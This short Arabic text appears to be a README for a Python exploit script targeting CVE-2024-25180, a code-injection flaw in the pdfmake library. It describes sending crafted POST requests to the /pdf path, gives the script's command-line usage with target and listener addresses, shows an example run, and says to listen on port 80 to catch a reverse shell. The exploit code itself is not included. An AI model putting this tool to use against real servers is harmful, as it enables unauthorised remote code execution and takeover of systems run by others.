
نص استغلال بايثون لـ CVE-2024-25180، ثغرة تنفيذ كود عن بعد في pdfmake، تسليم شل عكسية عبر طلبات POST مصممة.
pdfmake هي مكتبة JavaScript خالصة لطباعة PDF من جانب العميل/الخادم. الإصدارات المتأثرة من هذه الحزمة معرضة لهجمات حقن الأكواد التعسفية، حيث يمكن للمهاجم تنفيذ أكواد تعسفية عن طريق إرسال طلب POST مصمم خصيصًا للمسار/pdf. يمكن للمهاجم تنفيذ أكواد تعسفية على النظام عن طريق إرسال طلب مصمم خصيصًا.
CVE-2024-25180 تنفيذ الأكواد عن بُعد في pdfmake
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
استمع على المنفذ 80 للحصول على قوقعة عكسية (reverse shell)
